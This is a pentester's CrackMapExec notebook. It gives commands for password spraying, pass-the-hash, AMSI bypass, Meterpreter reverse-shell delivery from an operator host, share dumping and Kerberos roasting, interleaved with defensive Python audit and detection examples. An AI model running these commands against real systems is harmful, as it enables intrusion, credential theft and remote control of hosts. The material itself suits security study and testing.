Brinkles Pentesting Notebook

CrackMapExec

Last updated 2 years ago

Installation

Run the mass tools script and it will install CrackMapExec. Documentation: https://mpgn.gitbook.io/crackmapexec/

Using Credentials

Every protocol supports using credentials in one form or another.

crackmapexec <target(s)> -u username -p password

crackmapexec <target(s)> -u username -p 'Admin!123@'

From the database:

crackmapexec <target(s)> -id <cred ID(s)>

Multi-domain environment:

crackmapexec <target(s)> -u FILE -p password

where FILE contains one DOMAIN\user per line:

DOMAIN1\user

DOMAIN2\user

Brute force / password spraying:

crackmapexec <target(s)> -u username1 -p password1 password2

crackmapexec <target(s)> -u username1 username2 -p password1

crackmapexec <target(s)> -u ~/file_containing_usernames -p ~/file_containing_passwords

crackmapexec <target(s)> -u ~/file_containing_usernames -H ~/file_containing_ntlm_hashes

Password spraying without brute force (--no-bruteforce pairs line N of the username file with line N of the password or hash file instead of trying every combination):

crackmapexec <target(s)> -u ~/file_containing_usernames -H ~/file_containing_ntlm_hashes --no-bruteforce

crackmapexec <target(s)> -u ~/file_containing_usernames -p ~/file_containing_passwords --no-bruteforce

Using Kerberos

CME supports Kerberos authentication: point the KRB5CCNAME environment variable at the ticket cache and use the --kerberos option. When using --kerberos you need to target the same hostname (FQDN) as the one in the Kerberos ticket.

export KRB5CCNAME=/home/bonclay/impacket/bonclay.ccache

sudo cme smb zoro.gold.local --kerberos -x whoami

export KRB5CCNAME=/home/bonclay/impacket/administrator.ccache

cme smb zoro.gold.local --kerberos

sudo cme smb zoro.gold.local --kerberos -x whoami

Using Modules

Using Database

SMB - Scanning for Vulns

When you start an internal pentest, these are the first modules to try:

Zerologon:

crackmapexec smb <ip> -u '' -p '' -M zerologon

PetitPotam:

crackmapexec smb <ip> -u '' -p '' -M petitpotam

noPAC:

crackmapexec smb <ip> -u 'user' -p 'pass' -M nopac

Enumeration

Returns a list of live hosts:

cme smb 192.168.1.0/24

Check for null sessions:

cme smb 10.10.10.161 -u '' -p ''

cme smb 10.10.10.161 -u '' -p '' --pass-pol

cme smb 10.10.10.161 -u '' -p '' --users

cme smb 10.10.10.161 -u '' -p '' --groups

You can also use smbclient and rpcclient (-L lists shares and belongs to smbclient; rpcclient takes the host directly and drops you at its prompt):

smbclient -N -U "" -L \\10.10.10.161

rpcclient -N -U "" 10.10.10.161

rpcclient $> enumdomusers

Pulling the password policy:

cme smb 10.10.10.161 -u '' -p '' --pass-pol

Anonymous logon (make sure the password is empty):

cme smb 10.10.10.178 -u 'a' -p ''

You can also use...

smbclient -N -L \\10.10.10.178

rpcclient -N -U "" 10.10.10.178

Enumerate active sessions on the remote target:

cme smb 192.168.1.0/24 -u UserName -p 'PASSWORDHERE' --sessions

Enumerate permissions on all shares:

cme smb 192.168.1.0/24 -u UserName -p 'PASSWORDHERE' --shares

Enumerate disks on the remote target:

cme smb 192.168.1.0/24 -u UserName -p 'PASSWORDHERE' --disks

Enumerate logged-on users:

cme smb 192.168.1.0/24 -u UserName -p 'PASSWORDHERE' --loggedon-users

Enumerate domain users:

cme smb 192.168.1.0/24 -u UserName -p 'PASSWORDHERE' --users

Enumerate users by brute-forcing RIDs on the remote target:

cme smb 192.168.1.0/24 -u UserName -p 'PASSWORDHERE' --rid-brute

Enumerate domain groups:

cme smb 192.168.1.0/24 -u UserName -p 'PASSWORDHERE' --groups

Enumerate local groups on the remote target:

cme smb 192.168.1.0/24 -u UserName -p 'PASSWORDHERE' --local-groups

Enumerate hosts where SMB signing is not required: maps the live hosts on the network and saves a list containing only the hosts that do not require SMB signing.

cme smb 192.168.1.0/24 --gen-relay-list relaylistOutputFilename.txt

cat relaylistOutputFilename.txt

Checking domain credentials against a subnet:

cme smb 192.168.1.0/24 -u UserName -p 'PASSWORDHERE'
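The relay list is just the subset of hosts whose banner reports signing:False, and the same banner lines are the raw material for a remediation list. The following is an added example (not CrackMapExec code) that parses lines shaped like CME's per-host SMB banner into buckets a defender can act on; the exact banner layout is assumed from typical cme smb output, and every host, address and build number in the sample is constructed.

```python
"""Turn CME's SMB host banners into an SMB-signing remediation list.

Added example, not CrackMapExec code. --gen-relay-list writes only the
IPs that do not require signing; this parser reads the banner lines CME
prints while scanning (layout assumed from typical cme smb output) and
also separates domain-joined hosts from stragglers and flags SMBv1.
"""
import re
from dataclasses import dataclass

# Constructed sample lines shaped like CME's per-host banner. Hostnames,
# addresses and build numbers are made up.
SAMPLE_OUTPUT = """
SMB         192.168.1.5     445    DC01             [*] Windows Server 2019 Build 17763 x64 (name:DC01) (domain:corp.local) (signing:True) (SMBv1:False)
SMB         192.168.1.23    445    WS-FINANCE01     [*] Windows 10.0 Build 19041 x64 (name:WS-FINANCE01) (domain:corp.local) (signing:False) (SMBv1:False)
SMB         192.168.1.40    445    FILESRV          [*] Windows 6.1 Build 7601 x64 (name:FILESRV) (domain:corp.local) (signing:False) (SMBv1:True)
SMB         192.168.1.77    445    PRINTER01        [*] Unix - Samba (name:PRINTER01) (domain:WORKGROUP) (signing:False) (SMBv1:True)
SMB         192.168.1.90    445    WS-HR02          [*] Windows 10.0 Build 19045 x64 (name:WS-HR02) (domain:corp.local) (signing:True) (SMBv1:False)
"""

BANNER_RE = re.compile(
    r"^SMB\s+(?P<ip>\S+)\s+(?P<port>\d+)\s+\S+\s+\[\*\]\s+(?P<os>.+?)"
    r"\s+\(name:(?P<name>[^)]*)\)\s+\(domain:(?P<domain>[^)]*)\)"
    r"\s+\(signing:(?P<signing>True|False)\)\s+\(SMBv1:(?P<smbv1>True|False)\)"
)


@dataclass
class Host:
    ip: str
    name: str
    domain: str
    os: str
    signing_required: bool
    smbv1: bool


def parse_banner(line):
    """Parse one banner line; returns None for lines that are not banners."""
    m = BANNER_RE.match(line.strip())
    if not m:
        return None
    return Host(m["ip"], m["name"], m["domain"], m["os"],
                m["signing"] == "True", m["smbv1"] == "True")


def audit_signing(output):
    """Group parsed hosts into remediation buckets.

    'relay_list' is what --gen-relay-list would have written;
    'domain_joined_unsigned' are the hosts a domain GPO can fix
    ('Microsoft network server: Digitally sign communications (always)');
    'smbv1' hosts need the protocol disabled regardless of signing."""
    hosts = [h for h in map(parse_banner, output.splitlines()) if h]
    unsigned = [h for h in hosts if not h.signing_required]
    return {
        "relay_list": [h.ip for h in unsigned],
        "domain_joined_unsigned": [h.ip for h in unsigned if h.domain.upper() != "WORKGROUP"],
        "smbv1": [h.ip for h in hosts if h.smbv1],
        "compliant": [h.ip for h in hosts if h.signing_required and not h.smbv1],
    }


if __name__ == "__main__":
    for bucket, ips in audit_signing(SAMPLE_OUTPUT).items():
        print(f"{bucket:24s} {', '.join(ips) or '-'}")
```

Feed it the saved console output of a subnet scan and the domain-joined bucket is the list to hand to whoever owns the GPO; the WORKGROUP bucket (appliances, printers, Samba boxes) usually needs a per-device fix or network segmentation instead.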

After obtaining credentials in user:RID:LM:NT::: format, such as Administrator:500:aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c:::, you can pass either the full LM:NT hash or just the NT hash (the second half):

cme smb 192.168.1.0/24 -u UserName -H 'LM:NT'

cme smb 192.168.1.0/24 -u UserName -H 'NTHASH'

cme smb 192.168.1.0/24 -u Administrator -H '13b29964cc2480b4ef454c59562e675c'

cme smb 192.168.1.0/24 -u Administrator -H 'aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c'

Checking local credentials:

cme smb 192.168.1.0/24 -u UserName -p 'PASSWORDHERE' --local-auth

cme smb 192.168.1.0/24 -u '' -p '' --local-auth

cme smb 192.168.1.0/24 -u UserName -H 'LM:NT' --local-auth

cme smb 192.168.1.0/24 -u UserName -H 'NTHASH' --local-auth

cme smb 192.168.1.0/24 -u localguy -H '13b29964cc2480b4ef454c59562e675c' --local-auth

cme smb 192.168.1.0/24 -u localguy -H 'aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c' --local-auth

Command Execution

CME has three different command execution methods:

  1. wmiexec executes commands via WMI

  2. atexec executes commands by scheduling a task with the Windows Task Scheduler

  3. smbexec executes commands by creating and running a service

By default CME fails over to a different execution method if one fails. It attempts to execute commands in the following order:

  1. wmiexec

  2. atexec

  3. smbexec

If you want to force CME to use only one execution method, specify it with the --exec-method flag. In the following example, we execute whoami on the target using the -x flag:

crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami

You can also execute PowerShell commands directly using the -X flag:

crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable'

Bypass AMSI:

crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable' --amsi-bypass /path/payload

For example:

poetry run crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable' --smb-server-port 1337

will not work (blocked by AV), whereas

poetry run crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable' --smb-server-port 1337 --amsi-bypass /tmp/amsi

works and the command is executed.
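Each of the three execution methods above leaves a different trace on the target, which is what makes the --exec-method choice visible to a SOC: wmiexec spawns cmd.exe under WmiPrvSE.exe (Security 4688), atexec registers a one-off scheduled task (Security 4698) and smbexec installs a throwaway service whose ImagePath is a %COMSPEC% one-liner (System 7045). The following is an added example (not CrackMapExec code) that classifies constructed event records by method; the event IDs and the WmiPrvSE parent are standard Windows facts, while the admin-share and .tmp output-redirection patterns are heuristics assumed from how impacket-based implementations behave and should be tuned against real telemetry.

```python
"""Classify host events by the CME execution method that produced them.

Added example, not CrackMapExec code. The three methods leave different
traces: wmiexec spawns cmd.exe under WmiPrvSE.exe, atexec registers a
one-off scheduled task, smbexec installs a throwaway service whose
ImagePath is a %COMSPEC% one-liner. The redirection patterns below are
heuristics assumed from impacket-based implementations; tune them.
"""
import re

# Constructed sample events (dicts standing in for parsed Security/System
# log records). Names, paths and the random task/service names are made up.
SAMPLE_EVENTS = [
    {"EventID": 4688, "Computer": "WS01",
     "ParentProcessName": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "NewProcessName": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__1709283000.12 2>&1"},
    {"EventID": 4698, "Computer": "WS02", "TaskName": r"\aBcDeF",
     "TaskContent": "<Command>cmd.exe</Command>"
                    "<Arguments>/C whoami > %windir%\\Temp\\aBcDeF.tmp 2>&1</Arguments>"},
    {"EventID": 7045, "Computer": "WS03", "ServiceName": "ZqWxPk",
     "ImagePath": r"%COMSPEC% /Q /c echo whoami ^> \\127.0.0.1\C$\__output 2^>^&1 "
                  r"> %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat"},
    # benign look-alikes that must not fire
    {"EventID": 4688, "Computer": "WS04",
     "ParentProcessName": r"C:\Windows\explorer.exe",
     "NewProcessName": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c dir"},
    {"EventID": 7045, "Computer": "WS05", "ServiceName": "Spooler",
     "ImagePath": r"C:\Windows\System32\spoolsv.exe"},
]

# command output redirected to a loopback admin share, e.g. \\127.0.0.1\ADMIN$\__...
LOOPBACK_SHARE_RE = re.compile(r"\\\\127\.0\.0\.1\\(?:ADMIN|C)\$\\", re.IGNORECASE)
# scheduled task that runs cmd.exe and captures output into a .tmp file under Temp
TASK_OUTPUT_RE = re.compile(r"<Command>cmd\.exe</Command>.*\\Temp\\\S+\.tmp",
                            re.IGNORECASE | re.DOTALL)


def classify(event):
    """Return 'wmiexec', 'atexec', 'smbexec', or None for one event."""
    eid = event.get("EventID")
    if eid == 4688:
        parent = event.get("ParentProcessName", "").lower()
        if parent.endswith("wmiprvse.exe") and LOOPBACK_SHARE_RE.search(event.get("CommandLine", "")):
            return "wmiexec"
    elif eid == 4698:
        if TASK_OUTPUT_RE.search(event.get("TaskContent", "")):
            return "atexec"
    elif eid == 7045:
        path = event.get("ImagePath", "")
        if "%COMSPEC%" in path.upper() and LOOPBACK_SHARE_RE.search(path):
            return "smbexec"
    return None


def detect(events):
    """Return [(computer, method)] for every event that matches a method."""
    hits = []
    for ev in events:
        method = classify(ev)
        if method:
            hits.append((ev.get("Computer", "?"), method))
    return hits


if __name__ == "__main__":
    for computer, method in detect(SAMPLE_EVENTS):
        print(f"{computer}: remote execution consistent with {method}")
```

Because CME falls back through the methods in order, a host that logs all three patterns in quick succession is a strong sign the first two attempts were blocked (for example by a restricted WMI namespace or a disabled Task Scheduler) and the operator landed on the service-based method.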

Getting Shells

We can use the empire_exec module to execute an Empire agent's initial stager. In the background, the module connects to Empire's RESTful API, generates a launcher for the specified listener and executes it.

First set up the REST API:

Then just run the empire_exec module and specify the listener name:

crackmapexec smb 192.168.10.0/24 -u username -p password -M empire_exec -o LISTENER=test

Meterpreter: we can use the met_inject module to launch Meterpreter using the Invoke-MetasploitPayload.ps1 script. On your Metasploit instance, run the following commands:

use exploit/multi/script/web_delivery

The SRVHOST and SRVPORT variables configure the web server that hosts the script:

set SRVHOST 10.211.55

set SRVPORT 8443

The target variable determines what type of script we're using; 2 is PowerShell:

set target 2

Pick your payload. In this case, we'll use a reverse HTTPS Meterpreter payload:

set payload windows/meterpreter/reverse_https

set LHOST 10.211.55

set LPORT 443

run

Once run, the web_delivery module spins up the web server hosting the script and the reverse listener for our Meterpreter session. Then just run the met_inject module and specify the SRVHOST and SRVPORT values:

crackmapexec smb 192.168.10.0/24 -u username -p password -M met_inject -o SRVHOST=192.168.10.3 SRVPORT=8443 RAND=eYEssEwv2D SSL=http

Spidering Shares

The spider_plus module lets you list and dump all files from all readable shares.

List all readable files:

crackmapexec smb 10.10.10.10 -u 'user' -p 'pass' -M spider_plus

Dump all files (with -o READ_ONLY=false every file is copied to your host):

crackmapexec smb 10.10.10.10 -u 'user' -p 'pass' -M spider_plus -o READ_ONLY=false

Sending files to Remote Targets

cme smb 172.16.251.152 -u user -p pass --put-file /tmp/whoami.txt \\Windows\\Temp\\whoami.txt

Grab a file from the remote target:

cme smb 172.16.251.152 -u user -p pass --get-file \\Windows\\Temp\\whoami.txt /tmp/whoami.txt

Dumping Creds

CME when LAPS is installed on the Domain

If LAPS is used inside the domain, it can be hard to use CrackMapExec to execute a command on every computer in the domain. Therefore, a new core option has been added: --laps. If you have compromised an account that can read LAPS passwords, you can use CrackMapExec like this:

crackmapexec smb <ip> -u user-can-read-laps -p pass --laps

crackmapexec smb <ip> -u user-can-read-laps -p pass --laps --sam

Checking if the Service Spooler is running

crackmapexec smb <ip> -u 'user' -p 'pass' -M spooler

Checking if the WebDAV service is running:

crackmapexec smb <ip> -u 'user' -p 'pass' -M webdav

LDAP Authentication

Testing creds:

cme ldap 192.168.1.0/24 -u user -p password

cme ldap 192.168.1.0/24 -u user -H A29F7623FD11550DEF0192DE9246F46B

(domain name resolution is required)

ASREP Roast: you can retrieve the Kerberos 5 AS-REP etype 23 hash of users that do not require Kerberos pre-authentication if you have a list of users on the domain. The ASREPRoast attack looks for users without Kerberos pre-authentication required. That means anyone can send an AS_REQ to the KDC on behalf of any of those users and receive an AS_REP message. That message contains a chunk of data encrypted with the user's key, derived from their password, so the password can be cracked offline. More detail in Kerberos theory.

cme ldap 192.168.0.104 -u harry -p '' --asreproast output.txt

Using a username wordlist:

cme ldap 192.168.0.104 -u user.txt -p '' --asreproast output.txt

With authentication: if you have one valid credential on the domain, you can retrieve all the users and hashes where Kerberos pre-authentication is not required.

cme ldap 192.168.0.104 -u harry -p pass --asreproast output.txt

Use the --kdcHost option when domain name resolution fails:

cme ldap 192.168.0.104 -u harry -p pass --asreproast output.txt --kdcHost domain_name

To crack the hashes in output.txt with hashcat, use the following options:

hashcat -m18200 output.txt wordlist

Kerberoasting: you can retrieve the Kerberos 5 TGS-REP etype 23 hash using the Kerberoasting technique. The goal of Kerberoasting is to harvest TGS tickets for services that run on behalf of user accounts in AD, not computer accounts. Part of these TGS tickets is encrypted with keys derived from user passwords, so those credentials can be cracked offline. More detail in Kerberos theory. To perform this attack, you need an account on the domain.

cme ldap 192.168.0.104 -u harry -p pass --kerberoasting output.txt

hashcat -m13100 output.txt wordlist.txt

Unconstrained delegation: CrackMapExec can retrieve the list of all computers and users with the TRUSTED_FOR_DELEGATION flag:

cme ldap 192.168.0.104 -u harry -p pass --trusted-for-delegation

Admin Count: adminCount indicates that a given object has had its ACLs changed to a more secure value by the system because it was a member of one of the administrative groups (directly or transitively).

cme ldap 192.168.255.131 -u adm -p pass --admin-count

ESC8 (adcs module): list all PKI enrollment servers:

crackmapexec ldap <ip> -u user -p pass -M adcs

List all certificates inside a PKI:

crackmapexec ldap <ip> -u user -p pass -M adcs -o SERVER=xxxx
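Everything the four LDAP options above look for (no pre-authentication, user accounts carrying SPNs, TRUSTED_FOR_DELEGATION, adminCount=1) is a bit or attribute a directory owner can audit and fix before anyone points CME at the domain. The following is an added example (not CrackMapExec code) that runs that audit over a constructed export of user and computer objects; the userAccountControl bit values are the documented Microsoft constants, while every account name and SPN is made up.

```python
"""Audit an AD object export for the conditions CME's LDAP options look
for: accounts without Kerberos pre-authentication (--asreproast), user
accounts with SPNs (--kerberoasting), TRUSTED_FOR_DELEGATION
(--trusted-for-delegation) and adminCount=1 (--admin-count).

Added example, not CrackMapExec code. The userAccountControl bit values
are the documented Microsoft constants; the account data is constructed.
"""

# userAccountControl bits (Microsoft documentation)
ACCOUNTDISABLE = 0x0002
NORMAL_ACCOUNT = 0x0200
WORKSTATION_TRUST_ACCOUNT = 0x1000
SERVER_TRUST_ACCOUNT = 0x2000        # domain controllers
TRUSTED_FOR_DELEGATION = 0x80000     # unconstrained delegation
DONT_REQ_PREAUTH = 0x400000          # AS-REP roastable

# Constructed sample export: one dict per object, as an LDAP search over
# (objectClass=user) might return it. All names and SPNs are made up.
SAMPLE_OBJECTS = [
    {"sAMAccountName": "harry", "userAccountControl": NORMAL_ACCOUNT | DONT_REQ_PREAUTH,
     "adminCount": 0, "servicePrincipalName": []},
    {"sAMAccountName": "svc_sql", "userAccountControl": NORMAL_ACCOUNT,
     "adminCount": 0, "servicePrincipalName": ["MSSQLSvc/sql01.corp.local:1433"]},
    {"sAMAccountName": "svc_legacy",
     "userAccountControl": NORMAL_ACCOUNT | ACCOUNTDISABLE | DONT_REQ_PREAUTH,
     "adminCount": 0, "servicePrincipalName": ["HTTP/old.corp.local"]},
    {"sAMAccountName": "adm", "userAccountControl": NORMAL_ACCOUNT,
     "adminCount": 1, "servicePrincipalName": []},
    {"sAMAccountName": "WEB01$",
     "userAccountControl": WORKSTATION_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION,
     "adminCount": 0, "servicePrincipalName": ["HOST/web01.corp.local"]},
    {"sAMAccountName": "DC01$",
     "userAccountControl": SERVER_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION,
     "adminCount": 0, "servicePrincipalName": ["HOST/dc01.corp.local", "ldap/dc01.corp.local"]},
]


def is_enabled(obj):
    return not obj["userAccountControl"] & ACCOUNTDISABLE


def is_user(obj):
    return bool(obj["userAccountControl"] & NORMAL_ACCOUNT)


def audit(objects):
    """Return {finding: [sAMAccountName, ...]} for enabled objects.
    Disabled accounts are reported separately: they cannot be roasted
    today but become exposures the moment someone re-enables them."""
    enabled = [o for o in objects if is_enabled(o)]
    return {
        "asrep_roastable": [o["sAMAccountName"] for o in enabled
                            if o["userAccountControl"] & DONT_REQ_PREAUTH],
        # the page's point: user accounts with SPNs, not computer accounts
        "kerberoastable": [o["sAMAccountName"] for o in enabled
                           if is_user(o) and o["servicePrincipalName"]],
        # DCs are trusted for delegation by design, so only flag other hosts and users
        "unconstrained_delegation": [o["sAMAccountName"] for o in enabled
                                     if o["userAccountControl"] & TRUSTED_FOR_DELEGATION
                                     and not o["userAccountControl"] & SERVER_TRUST_ACCOUNT],
        "admin_count": [o["sAMAccountName"] for o in enabled if o.get("adminCount") == 1],
        "disabled_but_misconfigured": [o["sAMAccountName"] for o in objects
                                       if not is_enabled(o)
                                       and o["userAccountControl"] & DONT_REQ_PREAUTH],
    }


if __name__ == "__main__":
    for finding, names in audit(SAMPLE_OBJECTS).items():
        print(f"{finding:28s} {', '.join(names) or '-'}")
```

The remediation for each bucket is direct: clear DONT_REQ_PREAUTH on the roastable accounts, give SPN-bearing service accounts long random passwords or move them to group Managed Service Accounts, replace unconstrained delegation on member servers with constrained or resource-based delegation, and review whether every adminCount=1 object still needs its privileged group membership.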

WINRM Protocol

Password spraying (without brute force):

cme winrm 192.168.1.0/24 -u userfile -p passwordfile --no-bruteforce

Testing creds:

cme winrm 192.168.1.0/24 -u user -p password

If the SMB port is closed, you can also use the -d DOMAIN flag to avoid the SMB connection:

cme winrm 192.168.1.0/24 -u user -p password -d DOMAIN

Command execution:

cme winrm 192.168.255.131 -u user -p 'password' -X whoami

Using CrackMapExec when LAPS is installed on the domain: as with SMB above, if LAPS is used it can be hard to run a command on every computer in the domain, so use the --laps core option with a compromised account that can read LAPS passwords:

crackmapexec winrm <ip> -u user-can-read-laps -p pass --laps

MSSQL

Password spraying (without brute force):

cme mssql 192.168.1.0/24 -u userfile -p passwordfile --no-bruteforce

Windows auth with the SMB port open:

cme mssql 10.10.10.52 -u james -p 'J@m3s_P@ssW0rd!'

With the SMB port closed, add the domain flag:

cme mssql 10.10.10.52 -u james -p 'J@m3s_P@ssW0rd!' -d HTB

Local auth: use the --local-auth flag:

cme mssql 10.10.10.52 -u admin -p 'm$$ql_S@_P@ssW0rd!' --local-auth

Specify a non-default port:

cme mssql 10.10.10.52 -u admin -p 'm$$ql_S@_P@ssW0rd!' --port 1434

MSSQL privesc:

cme mssql <ip> -u user -p password -M mssql_priv

Execute MSSQL queries:

cme mssql 10.10.10.52 -u admin -p 'm$$ql_S@_P@ssW0rd!' --local-auth -q 'SELECT name FROM master.dbo.sysdatabases;'

Windows commands:

cme mssql 10.10.10.59 -u sa -p 'GWE3V65#6KFH93@4GWTG2G' --local-auth -x whoami

SSH

Password spraying (without brute force):

cme ssh 192.168.1.0/24 -u userfile -p passwordfile --no-bruteforce

Testing creds:

cme ssh 192.168.1.0/24 -u user -p password

On a non-default SSH port:

cme ssh 192.168.1.0/24 -u user -p password --port 2222

Command execution:

cme ssh 127.0.0.1 -u user -p password -x whoami

RDP

Password spraying:

poetry run crackmapexec rdp 192.168.1.0/24 -u user -p password

poetry run crackmapexec rdp 192.168.1.0/24 -u userfile -p passwordfile --no-bruteforce

GitHub: Porchetta-Industries/CrackMapExec - A swiss army knife for pentesting networks